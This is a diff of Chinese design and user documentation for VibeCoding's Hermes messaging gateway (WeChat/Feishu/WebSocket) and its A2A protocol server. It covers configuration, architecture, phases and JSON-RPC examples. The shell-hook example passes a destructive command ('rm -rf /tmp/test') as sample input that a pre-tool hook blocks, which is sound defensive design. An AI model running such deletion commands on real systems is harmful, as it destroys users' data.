+- 管理 Hermes 的 session、memory 等状态
+
+### 8.5 `config init` — 初始化级别
+
+```
+vibecoding hermes config init              # 默认写入 <GLOBAL_DIR>/hermes.json
+vibecoding hermes config init --global     # 显式写入 <GLOBAL_DIR>/hermes.json
+vibecoding hermes config init --project    # 写入 .vibe/hermes.json（自动创建 .vibe/ 目录）
+```
+
+`--global` 和 `--project` 互斥。目标文件已存在时报错，需加 `--force` 覆盖。
+
+项目级模板会省略全局性配置（如微信凭证路径），只包含项目可能需要覆盖的字段（如 `work_dir`、`memory`、`agent`、`security` 等）。
+
+### 8.6 配置文件 `hermes.json`
+
+加载优先级：`defaults` → `<GLOBAL_DIR>/hermes.json` → `.vibe/hermes.json`
+
+```jsonc
+{
+  // === 网关服务（始终启动） ===
+
+  "server": {
+    "port": 8090,                  // WebSocket + HTTP 监听端口
+    "host": "0.0.0.0",             // 监听地址（0.0.0.0 = 所有网卡，127.0.0.1 = 仅本地）
+    "auth_token": "${HERMES_AUTH_TOKEN}"  // 空 = 无认证（仅本地使用）
+  },
+
+  // === 默认 Provider/Model ===
+
+  "default_provider": "",          // 空 = 继承 settings.json 的 defaultProvider
+  "default_model": "",             // 空 = 继承 settings.json 的 defaultModel
+
+  // === 多 Agent 模式 ===
+
+  "multi_agent": false,             // 启用后注册子 Agent 工具（spawn/status/send/destroy）
+
+  // === Sandbox ===
+
+  "sandbox": false,                 // 启用 bwrap 沙箱隔离（默认关闭）
+
+  // === 微信 (iLink) ===
+
+  "wechat": {
+    "enabled": true,
+    "cred_path": "",               // 空 = 默认 <GLOBAL_DIR>/wechat-credentials.json
+    "work_dir": "",                // 空 = hermes 启动时的 cwd
+    "allowed_users": [],           // 空 = 允许所有人（危险！）
+    "auto_typing": true            // 自动显示"正在输入"
+  },
+
+  // === 飞书 ===
+
+  "feishu": {
+    "enabled": false,
+    "app_id": "${FEISHU_APP_ID}",
+    "app_secret": "${FEISHU_APP_SECRET}",
+    "work_dir": "",                // 空 = hermes 启动时的 cwd
+    "allowed_users": []
+  },
+
+  // === Webhook 入站 ===
+
+  "webhooks": {
+    "enabled": false,
+    "secret": "${WEBHOOK_SECRET}",
+    "routes": [
+      {
+        "path": "/github",
+        "events": ["push", "pull_request"],
+        "skill": "code-review",
+        "delivery": "wechat"
+      }
+    ]
+  },
+
+  // === A2A Server ===
+
+  "a2a": {
+    "enabled": false
+  },
+
+  // === Cron ===
+
+  "cron": {
+    "enabled": true
+  },
+
+  // === 记忆 ===
+
+  "memory": {
+    "enabled": true,
+    "path": ""                     // 空 = 按优先级查找: .vibe/memory.md → <GLOBAL_DIR>/memory.md
+  },
+
+  // === 安全 ===
+
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": []        // 空 = 仅允许 work_dir 及其子目录
+  },
+
+  // === Shell Hooks ===
+
+  "hooks": {
+    "pre_tool_call": "",           // 外部脚本路径
+    "post_tool_call": ""
+  },
+
+  // === Agent ===
+
+  "agent": {
+    "max_turns": 90,
+    "budget_pressure": true,
+    "context_pressure": true
+  },
+
+  // === 默认工作目录 ===
+
+  "work_dir": "."                  // hermes 启动时的默认工作目录（微信/飞书未单独配置时的 fallback）
+}
+```
+
+**工作目录解析优先级**：
+
+```
+平台级 work_dir (微信/飞书 单独配置)
+  → 全局 work_dir (hermes.json 顶层)
+    → CLI --work-dir 参数
+      → hermes 启动时的 cwd
+```
+
+每个消息平台可以有独立的工作目录，适用于“微信管理项目 A，飞书管理项目 B”的场景。
+
+### 8.7 消息平台进度事件推送
+
+Hermes 模式下，agent 执行过程中会实时向消息平台（微信/飞书）推送进度事件，最后再发送完整总结。
+
+#### 推送内容
+
+| 事件类型 | 格式 | 说明 |
+|----------|------|------|
+| 思考过程 | `💭 <思考内容...>` | 模型推理过程，截断 500 字符 |
+| 工具执行 | `[tool]: args ✅/❌` | 工具调用结果，一行摘要 |
+| 完整总结 | （完整文本） | agent 最终输出 |
+
+#### 工具进度格式示例
+
+```
+💭 用户想了解项目结构，让我先看看目录...
+[ls]: . ✅
+[read]: .vibe/memory.md ✅
+[bash]: go build ./... ✅
+[grep]: NewStore ✅
+[find]: *.go ✅
+[write]: output.txt ✅
+[memory] ✅
+
+（完整总结文本）
+```
+
+#### 实现机制
+
+- `messaging.InboundMessage` 新增 `ProgressFunc func(text string)` 回调
+- 微信/飞书 bot 收到消息时设置 `ProgressFunc`，内部调用 `SendMessage` 推送进度
+- `dispatcher.runAgent` 监听 `EventThinkDelta`（累积后推送）和 `EventToolExecutionEnd`（格式化一行进度）
+- WebSocket 路径不受影响，仍通过 event channel 流式推送
+
+### 8.8 Provider/Model 配置优先级
+
+```bash
+# CLI 标志（最高优先级）
+vibecoding hermes start -p openai -m gpt-4o
+
+# hermes.json 配置
+{ "default_provider": "openai", "default_model": "gpt-4o" }
+
+# settings.json（最低优先级，继承）
+{ "defaultProvider": "deepseek", "defaultModel": "deepseek-chat" }
+```
+
+优先级：CLI `-p`/`-m` 标志 > `hermes.json` > `settings.json`
+
+### 8.9 MCP 工具继承
+
+Hermes 自动加载全局和项目的 `mcp.json` 配置，与 CLI 行为一致。MCP 工具注册到每个 session 的 tool registry 中，session 移除/轮转时自动关闭 MCP 连接。
+
+---
+
+## 9. 架构设计
+
+### 9.1 新增包结构
+
+```
+internal/
+├── messaging/                   # 消息平台层（抽象 + 各平台实现）
+│   ├── platform.go              # ✅ Platform 接口 + InboundMessage 等公共类型
+│   ├── progress.go              # ✅ ProgressBuffer 批量进度推送（新增，提案未列出）
+│   ├── progress_test.go         # ✅
+│   ├── wechat/                  # ✅ 微信 iLink 适配器（自行实现，零外部依赖）
+│   │   ├── wechat.go            # ✅ Bot 主体，实现 messaging.Platform
+│   │   ├── types.go             # ✅ iLink 协议类型定义
+│   │   ├── protocol.go          # ✅ iLink HTTP API 调用
+│   │   ├── auth.go              # ✅ QR 登录 + 凭证持久化
+│   │   └── crypto.go            # ✅ AES-128-ECB CDN 加解密
+│   └── feishu/                  # ✅ 飞书适配器
+│       └── feishu.go            # ✅ 飞书 SDK 封装（长连接），实现 messaging.Platform
+│                               #    ⚠️ session.go 未创建（per-user session 由 dispatcher 统一管理）
+│
+├── hermes/                      # Hermes 模式编排层
+│   ├── server.go                # ✅ 守护进程主循环（组装 gateway + messaging + cron）
+│   ├── config.go                # ✅ hermes.json 配置加载（全局 + 项目级合并）
+│   ├── config_test.go           # ✅
+│   ├── dispatcher.go            # ✅ 消息 → Agent 转发调度器
+│   ├── security.go              # ✅ 用户白名单 + 命令风险分类 + 自动审批（新增）
+│   ├── security_test.go         # ✅
+│   ├── webhook_handler.go       # ✅ Webhook → Agent 任务处理（新增）
+│   ├── webhook_handler_test.go  # ✅
+│   ├── ws/                      # ✅ WebSocket + HTTP 网关
+│   │   ├── server.go            # ✅ net/http 服务器（⚠️ 使用 golang.org/x/net/websocket 而非 gorilla/websocket）
+│   │   ├── handler.go           # ✅ WebSocket 消息处理
+│   │   └── api.go               # ✅ HTTP REST API
+│   ├── a2a/                     # ❌ A2A 协议 Server — 目录不存在，未实现
+│   ├── webhook/                 # ✅ Webhook 入站
+│   │   └── router.go            # ✅ HMAC-SHA256 验签 + 路由分发
+│   └── hooks/                   # ✅ Shell Hooks
+│       └── hooks.go             # ✅ 外部脚本调用（JSON stdin/stdout）
+│
+├── a2a/                         # 🔶 待实现 — A2A 协议（独立于 hermes 的顶层包）
+│   ├── server.go                # A2A HTTP server（独立模式 + 集成模式）
+│   ├── handler.go               # JSON-RPC 2.0 handler
+│   ├── agent_card.go            # Agent Card 生成
+│   ├── task.go                  # Task 生命周期管理
+│   ├── executor.go              # AgentExecutor（A2A Task → agent loop）
+│   ├── sse.go                   # SSE 流式响应
+│   └── config.go                # A2A 配置
+│
+├── memory/                      # 持久化记忆
+│   ├── store.go                 # ✅ memory.md 读写（全局/项目级查找逻辑）
+│   ├── store_test.go            # ✅
+│   └── tool.go                  # ✅ memory 工具定义
+│
+└── (existing packages unchanged)
+```
+
+> **与提案的偏差**：
+> 1. `feishu/session.go` 未创建 — per-user session 由 `dispatcher.go` 统一管理，不需要单独的 feishu session 文件
+> 2. `ws/server.go` 使用 `golang.org/x/net/websocket` 而非提案中的 `gorilla/websocket`
+> 3. 新增了提案未列出的文件：`messaging/progress.go`、`hermes/security.go`、`hermes/webhook_handler.go`
+> 4. A2A 从 `internal/hermes/a2a/` 移至 `internal/a2a/`（独立顶层包）
+
+> **架构要点**：
+> - `hermes/ws/` 是新增的 **WebSocket + HTTP 网关层**，Hermes 启动后始终运行，是所有客户端（`hermes client`、第三方应用）的接入点。
+> - Webhook 和 A2A 复用同一个 HTTP 端口（`server.port`），通过路由区分：`/ws`、`/a2a`、`/webhook/*`、`/api/*`。
+> - `internal/messaging/` 是消息平台的**抽象 + 实现**层，纯粹关注"接收消息、发送消息"。每个子包是独立适配器，实现 `messaging.Platform` 接口。
+> - `internal/hermes/` 是 Hermes 模式的**编排层**，负责把 gateway、messaging、webhook、cron、agent loop 组装到一起运行。
+> - 新增平台只需在 `messaging/` 下加子包，无需改动编排层。
+
+### 9.2 消息平台抽象
+
+> ✅ **已实现** — `internal/messaging/platform.go` 完整实现了以下接口。额外增加了 `IsConnected()` 方法和 `ProgressFunc` 字段。
+
+```go
+// internal/messaging/platform.go
+package messaging
+
+type Platform interface {
+    Name() string
+    Start(ctx context.Context, handler MessageHandler) error
+    Stop() error
+    SendMessage(ctx context.Context, chatID string, text string) error
+    IsConnected() bool  // 新增：提案中未列出
+}
+
+type MessageHandler func(ctx context.Context, msg InboundMessage) (string, error)
+
+type InboundMessage struct {
+    Platform  string
+    ChatID    string
+    UserID    string
+    UserName  string
+    Text      string
+    Timestamp time.Time
+    ProgressFunc func(text string)  // 新增：提案中未列出，用于进度推送
+}
+```
+
+### 9.3 hermes.json 配置加载（复用已有模式）
+
+```go
+// internal/hermes/config.go — 遵循 gateway.json 相同模式
+
+func HermesConfigPath() string {
+    return filepath.Join(config.ConfigDir(), "hermes.json")  // <GLOBAL_DIR>/hermes.json
+}
+
+func ProjectHermesConfigPath() string {
+    return filepath.Join(".vibe", "hermes.json")  // .vibe/hermes.json
+}
+
+func LoadHermesConfig() (*HermesConfig, error) {
+    cfg, err := loadHermesConfigFrom(HermesConfigPath())    // 1. 加载全局
+    if err != nil { return nil, err }
+    // 2. 项目级覆盖
+    if data, err := os.ReadFile(ProjectHermesConfigPath()); err == nil {
+        if err := json.Unmarshal(data, cfg); err != nil {
+            return nil, fmt.Errorf("parse project hermes config: %w", err)
+        }
+    }
+    return cfg, nil
+}
+```
+
+### 9.4 复用关系
+
+```
+hermes server (internal/hermes/)
+  │
+  ├─ 完全复用 ──────────────────────────────
+  │   ├── agent.Agent          (agent loop)
+  │   ├── provider.*           (OpenAI/Anthropic)
+  │   ├── tools.Registry       (所有内置工具)
+  │   ├── session.Store        (JSONL 持久化)
+  │   ├── sandbox              (bwrap)
+  │   ├── skills               (SKILL.md)
+  │   ├── context compaction   (压缩)
+  │   ├── context files        (AGENTS.md)
+  │   └── config.ConfigDir()   (全局配置目录解析)
+  │
+  ├─ 新增 ──────────────────────────────────
+  │   ├── hermes/ws            (WebSocket + HTTP 网关，始终启动)
+  │   ├── memory tool          (memory.md 按需读写，不注入 system prompt)
+  │   ├── messaging.Platform   (WeChat iLink / Feishu，可选连接)
+  │   ├── a2a                  (A2A Server — 独立顶层包，Agent 间协作)
+  │   ├── hermes/webhook       (入站 webhook)
+  │   ├── hermes.Hooks         (shell hooks)
+  │   ├── context pressure     (compaction 层注入) 🔶 待实现
+  │   └── smart approvals      (tools 层拦截) 🔶 待讨论
+  │
+  └─ 增强 ──────────────────────────────────
+      └── cron                 (管理 CLI 补齐)
+```
+
+### 9.5 Shell Hooks 协议
+
+外部脚本通过 JSON stdin/stdout 通信：
+
+**pre_tool_call — stdin:**
+```json
+{
+  "hook": "pre_tool_call",
+  "tool": "bash",
+  "args": {"command": "rm -rf /tmp/test"},
+  "platform": "wechat",
+  "user_id": "wxid_12345"
+}
+```
+
+**stdout:**
+```json
+{"action": "allow"}
+```
+或
+```json
+{"action": "block", "reason": "destructive command blocked"}
+```
+
+---
+
+## 10. 实施阶段
+
+### Phase 1: 骨架 & 配置 & 网关
+
+- [x] `internal/messaging/platform.go` — Platform 接口定义（含 ProgressFunc）
+- [x] `internal/hermes/` 编排层骨架
+- [x] `internal/hermes/config.go` — hermes.json 配置加载（含 `server` 节、平台 `work_dir`、全局/项目级合并）
+- [x] `internal/hermes/ws/` — WebSocket + HTTP 网关骨架（server.go + handler.go + api.go）
+- [x] `vibecoding hermes` 子命令注册（start/stop/status/config/client/wechat/feishu/cron）
+- [x] Hermes server 主循环框架（启动网关 → 可选连接消息平台）
+- [x] `hermes/dispatcher.go` — per-user session 路由（`<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`）
+- [x] session 归档逻辑（`/new` → `active.jsonl` 重命名 + 新建）
+- [x] CLI 标志: `-p`/`--provider`、`-m`/`--model`、`--multi-agent`、`--sandbox`
+- [x] hermes.json 新增字段: `default_provider`、`default_model`、`multi_agent`、`sandbox`
+- [x] MCP 服务器加载（继承全局/项目 mcp.json 配置）
+- [x] 消息平台进度事件推送（ProgressFunc: 工具执行 + 思考过程逐行发送）
+
+> **偏差**：
+> - WebSocket 使用 `golang.org/x/net/websocket` 而非 `gorilla/websocket`
+> - WebSocket 消息处理是同步模式（等 agent 完成后一次性返回），非真正的逐事件流式
+> - `stop`/`status`/`client` 命令是 stub，未实现
+
+### Phase 2: memory 工具 & 压力系统
+
+- [x] `internal/memory/store.go` — memory.md 读写（含 `.vibe/memory.md` → `<GLOBAL_DIR>/memory.md` 查找逻辑）
+- [x] `internal/memory/tool.go` — memory 工具（read/add/update/delete）
+- [x] System prompt guidelines 添加静态 memory 提示
+- [x] memory.md 默认写入项目目录（只有显式配置 `memory.path` 才写全局）
+- [x] Budget Pressure — MaxIterations 从 hermes config `agent.max_turns` 注入
+- [ ] Context Pressure — compaction 阈值警告
+
+> **偏差**：
+> - Budget Pressure 仅注入了 MaxIterations 上限，**未在 tool result 中注入迭代预算警告**（提案要求「在 tool result 中注入迭代预算警告」）
+> - Context Pressure 完全未实现（仅有配置字段）
+
+### Phase 3: 安全层
+
+- [x] Smart Approvals — 命令危险性分类（默认 yolo 模式）
+- [x] Shell Hooks — pre/post tool call 外部脚本（已接入 AfterToolCall）
+- [x] 用户白名单验证
+
+> **偏差**：Smart Approvals 的 WebSocket `approval_request` 交互流未实现（handler.go 中 approval case 标注 TODO）
+
+### Phase 4: 微信网关
+
+- [x] `internal/messaging/wechat/types.go` — iLink 协议类型定义
+- [x] `internal/messaging/wechat/protocol.go` — iLink HTTP API 调用
+- [x] `internal/messaging/wechat/auth.go` — QR 登录 + 凭证持久化到 `<GLOBAL_DIR>/wechat-credentials.json`
+- [x] `internal/messaging/wechat/crypto.go` — AES-128-ECB CDN 加解密
+- [x] `internal/messaging/wechat/wechat.go` — 实现 `messaging.Platform`
+- [x] `internal/hermes/dispatcher.go` — 消息 → Agent 转发
+- [x] `vibecoding hermes wechat login` — QR 码登录
+- [x] 消息平台命令（/new /clear /mode /status /sessions）
+
+> **无偏差** — 微信网关完整实现了提案中所有功能点。
+
+### Phase 5: 飞书网关
+
+- [x] `go get github.com/larksuite/oapi-sdk-go/v3`
+- [x] `internal/messaging/feishu/feishu.go` — 实现 `messaging.Platform`（长连接）
+- [x] `vibecoding hermes feishu setup` — 交互式配置
+- [x] `vibecoding hermes feishu status` — 连接状态
+
+> **偏差**：
+> - 提案中的 `feishu/session.go`（per-user Session 管理）**未创建** — session 由 `dispatcher.go` 统一管理
+> - `feishu setup` 仅打印配置说明文本，非真正的交互式配置向导
+
+### Phase 6: A2A Server + Webhook + Cron
+
+- [x] `internal/a2a/config.go` — A2A 配置
+- [x] `internal/a2a/task.go` — Task 生命周期管理（submitted → working → completed/failed/canceled）
+- [x] `internal/a2a/handler.go` — JSON-RPC 2.0 handler（message/send, task/get, task/cancel）+ SSE 流式
+- [x] `internal/a2a/agent_card.go` — Agent Card 生成 (/.well-known/agent.json)
+- [x] `internal/a2a/executor.go` — DefaultExecutor（A2A Task → agent loop）
+- [x] `internal/a2a/server.go` — A2A HTTP server（独立模式 + 集成模式）
+- [x] `cmd/vibecoding/main_a2a.go` — `vibecoding a2a` 子命令（start/stop/status/card）
+- [x] hermes 集成：`a2a.enabled: true` 时将 A2A 端点挂载到 hermes HTTP mux
+- [x] `internal/hermes/webhook/` — HTTP 入站 webhook 路由
+- [x] Webhook 路由 → Agent 任务（webhook_handler.go）
+- [x] Cron 管理 CLI 命令（list/add/remove/enable/disable）
+
+> **A2A 已完成**：零外部依赖，直接实现 JSON-RPC 2.0 over HTTP + SSE 流式。
+> **Cron 已确认**：CLI 命令范围已确定（不做 edit/run），底层 cron 实现与项目共享，有 bug 或缺陷仍需修复完善。
+
+### Phase 7: WebSocket 流式推送 & 补全 CLI
+
+- [x] WebSocket 流式推送：`wsDispatcherAdapter` 改为监听 `chan agent.Event`，逐事件转换为 `WSEvent` 发送
+- [x] `hermes stop` — PID 文件 + SIGTERM 信号
+- [x] `hermes status` — PID 检查 + HTTP health 查询
+- [x] `hermes client` — WebSocket 客户端（流式输出 + 斜杠命令 + session 恢复）
+- [x] `hermes webhook list` — webhook 路由查看
+- [x] `hermes memory show/clear` — memory 查看和清空
+- [x] `hermes sessions list` — 查询运行实例的活跃 session
+- [x] `/api/memory` HTTP — 集成 MemoryStore 实现 GET/PUT
+
+### Phase 8: Context Pressure & 压力系统
+
+- [x] Context Pressure — `EventContextPressure` 事件，55% 阈值触发一次，上层决策处理
+- [x] Budget Pressure — `EventBudgetPressure` 事件，剩余 20% 时触发一次
+- [x] hermes.json 配置：`agent.context_pressure_threshold`（默认 0.55）、`agent.budget_pressure_threshold`（默认 0.20）
+- [x] hermes dispatcher 事件转发到消息平台 ProgressFunc
+- [ ] WebSocket 流式推送压力事件（依赖 Phase 7 流式改造）
+
+> **设计决策**：
+> - Context Pressure 使用 Event 通知模式（方案 C），由上层决定如何处理
+> - Budget Pressure 在剩余 20% 时一次性注入（方案 B），不重复打扰
+> - 阈值可配置，默认 Context 55%、Budget 剩余 20%
+
+### Phase 9: Smart Approvals
+
+- [x] 方案 D 分级策略实现
+  - low risk → 自动批准
+  - medium risk → 自动批准 + 通知用户
+  - high risk (WebSocket) → 发送 `approval_request`，等待用户 `approval_response`（5 分钟超时）
+  - high risk (消息平台) → 自动拒绝 + 通知用户
+- [x] `security.go` — `FormatApprovalNotification()` 通知格式化
+- [x] `dispatcher.go` — `RegisterApproval()` / `ResolveApproval()` 审批状态管理
+- [x] `ws/handler.go` — `approval` 消息处理 → `ResolveApproval()`
+- [x] `server.go` — `agentEventToWSEvent` 转换 `EventToolApprovalRequest`
+
+> **设计决策**：
+> - 消息平台不支持交互式审批（无法暂停 agent loop 等待用户回复），高风险命令自动拒绝
+> - WebSocket 支持完整审批流：`approval_request` → 用户回复 → `approval_response`
+> - 审批超时 5 分钟，超时自动拒绝
+
+### Phase 10: 文档 & 测试
+
+- [x] hermes 子命令使用文档 (`docs/en/hermes.md`, `docs/zh/hermes.md`)
+- [x] hermes.json 配置文档（含全局/项目级层级说明）
+- [x] 微信 iLink / 飞书 Bot 设置指南
+- [x] A2A Server 接入文档 (`docs/en/a2a.md`, `docs/zh/a2a.md`)
+- [x] `vibecoding a2a` 子命令文档
+- [x] 单元测试（schedule, progress buffer, security, config, cron tool, webhook handler）
+- [x] Changelog 更新 (`docs/en/changelog.md`, `docs/zh/changelog.md`)
+- [ ] 集成测试
+
+---
+
+## 11. 与现有模式的关系
+
+| 维度 | CLI (TUI) | ACP | Gateway | **Hermes (新增)** | **A2A (新增)** |
+|------|-----------|-----|---------|-------------------|----------------|
+| **入口** | 终端 stdin | Editor stdio | HTTP API | **WebSocket + HTTP 网关** + 消息平台 (微信/飞书) | **JSON-RPC 2.0 over HTTP** |
+| **使用者** | 开发者本人 | 编辑器 | 其他应用 | **终端用户 (Bot) / 开发者 (`client`)** | **其他 Agent** |
+| **Session** | 本地管理 | 编辑器管理 | 客户端指定 | **服务端管理 (per-user，`client` 可跨终端恢复)** | **Task 生命周期** |
+| **认证** | 无 | 无 | Bearer token | **平台用户白名单** | **Bearer token** |
+| **常驻** | 否 | 否 | 是 | **是（`client` 按需连接）** | **是** |
+| **Cron** | 无 | 无 | 无 | **内置调度器** | 无 |
+| **记忆** | 无 | 无 | 无 | **memory.md (tool 按需读写)** | 无 |
+| **配置** | `settings.json` | `settings.json` | `gateway.json` | **`hermes.json`** | **`a2a.json` 或 hermes.json 中 a2a 节** |
+| **配置层级** | `<GLOBAL_DIR>` + `.vibe/` | `<GLOBAL_DIR>` + `.vibe/` | `<GLOBAL_DIR>` + `.vibe/` | **`<GLOBAL_DIR>` + `.vibe/`** | **`<GLOBAL_DIR>` + `.vibe/`** |
+| **A2A** | 无 | 无 | 无 | **集成模式（配置启用）** | **独立模式 + 集成模式** |
+
+---
+
+## 12. 供应链安全原则
+
+| 组件 | 策略 | 说明 |
+|------|------|------|
+| 微信 iLink | **自行实现** | 参考 iLink 协议规范实现为 internal 包，零外部依赖 |
+| 飞书 SDK | **官方 SDK** | `larksuite/oapi-sdk-go` 飞书官方维护，可接受 |
+| A2A SDK | **官方 SDK** | `a2aproject/a2a-go` Google/Linux Foundation 维护，可接受 |
+| CDN 加密 | **标准库** | `crypto/aes` Go 标准库，无外部依赖 |
+| HTTP 调用 | **标准库** | `net/http` Go 标准库 |
+
+> **原则**：能用标准库实现的不引入外部包；必须引入的只用官方/基金会维护的 SDK。
+
+---
+
+## 13. 非目标
+
+1. **Web 搜索** — 用户通过第三方 skill 扩展
+2. **Checkpoints / Rollback** — 推迟
+3. **企业微信** — 用个人微信 iLink 代替
+4. **Memory 注入 system prompt** — 破坏缓存命中，改用 tool 按需读写
+5. **Telegram / Discord** — v0.1.28
+6. **Python 插件 / RL Training / Voice** — 不做
+
+---
+
+*决策已确认。可以开始开发。*
diff --git a/docs/multi-agent-architecture-plan.md b/docs/proposal/multi-agent-architecture-plan.md
similarity index 100%
rename from docs/multi-agent-architecture-plan.md
rename to docs/proposal/multi-agent-architecture-plan.md
diff --git a/docs/zh/README.md b/docs/zh/README.md
index 974c837..6a7269f 100644
--- a/docs/zh/README.md
+++ b/docs/zh/README.md
@@ -8,6 +8,10 @@
   <strong>AI 驱动的终端编码助手</strong>
 </p>
 
+<p align="center">
+  主打渐进式、敏捷开发体验的 VibeCoding 工具，整体打包为单个文件，开箱即用，无需重复搭建部署 Claude Code 、 codex、Claw、Hermes 环境。
+</p>
+
 <p align="center">
   <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
   <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
@@ -55,6 +59,7 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 - [系统架构](architecture.md) — 项目结构、核心组件、数据流
 - [工具系统](tools.md) — 内置工具使用指南
 - [技能系统](skills.md) — 可复用提示片段
+- [在线Skill市场集成](skillhub.md) — 兼容 SkillHub / ClawHub，技能安装与 Cron 基础设施
 - [会话管理](sessions.md) — 会话存储和管理
 - [SDK 集成指南](sdk.md) — 将 VibeCoding Agent 嵌入你的 Go 应用
 
@@ -64,6 +69,14 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 ### IDE 集成
 - [ACP 协议](acp.md) — Agent Client Protocol 支持 VS Code 和 JetBrains
 
+### 网关模式
+- [Gateway 模式](gateway.md) — OpenAI 兼容 HTTP 网关
+- [Hermes 模式](hermes.md) — 消息平台网关 (微信/飞书/WebSocket)
+- [A2A 协议](a2a.md) — Agent-to-Agent 协议服务器与 Master 模式
+
+### 场景演示
+- [场景演示](scenarios.md) — 各种模式的实际用法和工作流
+
 ### 开发
 - [开发指南](development.md) — 贡献代码、测试、构建
 
@@ -82,7 +95,9 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 | [ACP 协议](acp.md) | 通过 Agent Client Protocol 集成 IDE |
 | [会话管理](sessions.md) | 对话历史和分支 |
 | [技能系统](skills.md) | 创建可复用提示片段 |
+| [在线Skill市场集成](skillhub.md) | 兼容 SkillHub / ClawHub，技能安装与 Cron 基础设施 |
 | [SDK 集成指南](sdk.md) | 将 VibeCoding Agent 嵌入你的 Go 应用 |
+| [场景演示](scenarios.md) | 各种模式的实际用法和工作流 |
 | [更新日志](changelog.md) | 查看每个版本的新内容 |
 
 ## 支持的 LLM
@@ -92,7 +107,7 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 | **DeepSeek**（默认） | deepseek-v4-flash, deepseek-v4-pro | OpenAI Chat / Anthropic Messages |
 | **OpenAI** | GPT-4o, o1 等 | OpenAI Chat |
 | **Anthropic** | Claude Sonnet, Opus 等 | Anthropic Messages |
-| **厂商适配器** | 小米、Kimi、MiniMax、Seed、Qianfan、Bailian、Gitee、OpenRouter、Together、Groq、Fireworks 等 | OpenAI Chat 或 Anthropic Messages |
+| **厂商适配器** | Google Gemini、Google Vertex、小米、Kimi、MiniMax、Seed、Qianfan、Bailian、Gitee、OpenRouter、Together、Groq、Fireworks 等 | OpenAI Chat 或 Anthropic Messages |
 | **自定义** | 任何兼容模型 | 通用 OpenAI Chat 或 Anthropic Messages fallback |
 
 ## 快速安装
diff --git a/docs/zh/a2a.md b/docs/zh/a2a.md
new file mode 100644
index 0000000..887288a
--- /dev/null
+++ b/docs/zh/a2a.md
@@ -0,0 +1,372 @@
+# A2A 协议（Agent-to-Agent）
+
+## 概述
+
+A2A（Agent-to-Agent）协议使不同的 AI Agent 能够互相发现、通信和协作。VibeCoding 实现了 A2A 协议，支持**独立服务器**和 **Hermes 集成模式**两种运行方式。
+
+## 快速开始
+
+```bash
+# 独立模式
+vibecoding a2a start
+
+# 查看状态
+vibecoding a2a status
+
+# 查看 Agent Card
+vibecoding a2a card
+
+# 向其他 A2A 服务器发送任务
+vibecoding a2a send "列出所有 Go 文件" --target http://remote:8093
+
+# 发现远程 Agent Card
+vibecoding a2a discover http://remote:8093
+
+# 停止
+vibecoding a2a stop
+```
+
+## 运行模式
+
+### 独立模式
+
+在单独的端口运行专用的 A2A HTTP 服务器（默认：`127.0.0.1:8093`）。
+
+```bash
+vibecoding a2a start --port 8093 --work-dir /path/to/project
+```
+
+只有在明确需要对外暴露 A2A 服务时才使用 `--host 0.0.0.0`，并为对外部署配置 auth token。
+
+### 集成模式
+
+当 `hermes.json` 中 `a2a.enabled: true` 时，A2A 端点挂载到 Hermes 网关上。
+
+```jsonc
+{
+  "a2a": {
+    "enabled": true,
+    "port": 8093  // 集成模式下忽略（使用 hermes 端口）
+  }
+}
+```
+
+端点地址：
+- `http://localhost:8090/.well-known/agent.json`
+- `http://localhost:8090/a2a`
+- `http://localhost:8090/a2a/events`
+
+## 协议细节
+
+- **传输**：JSON-RPC 2.0 over HTTP
+- **流式**：SSE（Server-Sent Events）实时推送
+- **Task 生命周期**：`submitted` → `working` → `completed`/`failed`/`canceled`
+
+## Agent Card
+
+Agent Card 描述 Agent 的能力，在 `/.well-known/agent.json` 提供。
+
+```json
+{
+  "name": "VibeCoding",
+  "description": "AI coding assistant with file editing, terminal, and search capabilities",
+  "url": "http://localhost:8093/a2a",
+  "version": "0.1.31",
+  "capabilities": {
+    "streaming": true,
+    "pushNotifications": false
+  },
+  "skills": [
+    {
+      "id": "code-edit",
+      "name": "Code Editing",
+      "description": "Read, write, and edit code files with precise text replacement"
+    },
+    {
+      "id": "terminal",
+      "name": "Terminal Execution",
+      "description": "Execute shell commands, run tests, build projects"
+    },
+    {
+      "id": "code-search",
+      "name": "Code Search",
+      "description": "Search codebases with ripgrep and fd"
+    }
+  ]
+}
+```
+
+## JSON-RPC 方法
+
+### `message/send`
+
+发送消息以创建或继续任务。
+
+**请求：**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "message/send",
+  "params": {
+    "task_id": "task_123",  // 可选，省略则创建新任务
+    "message": {
+      "role": "user",
+      "parts": [
+        {"type": "text", "text": "帮我重构 main.go"}
+      ]
+    }
+  },
+  "id": 1
+}
+```
+
+**响应（同步）：**
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "id": "task_123",
+    "state": "completed",
+    "artifacts": [
+      {
+        "name": "response",
+        "parts": [{"type": "text", "text": "我已经分析了 main.go..."}]
+      }
+    ]
+  },
+  "id": 1
+}
+```
+
+**SSE 流式（添加 `Accept: text/event-stream` 头）：**
+```
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":"让我"}]}}
+
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":"分析代码..."}]}}
+
+data: {"task_id":"task_123","state":"completed","artifact":{"name":"response","parts":[{"type":"text","text":"这是重构后的版本..."}]}}
+```
+
+### `task/get`
+
+获取任务当前状态。
+
+**请求：**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/get",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 2
+}
+```
+
+### `task/cancel`
+
+取消运行中的任务。
+
+**请求：**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/cancel",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 3
+}
+```
+
+## REST 端点
+
+为简化集成，也提供 REST 风格的端点：
+
+| 端点 | 方法 | 说明 |
+|------|------|------|
+| `/.well-known/agent.json` | GET | Agent Card |
+| `/a2a` | POST | JSON-RPC 2.0 端点 |
+| `/a2a/send` | POST | 提交任务（同步或 SSE） |
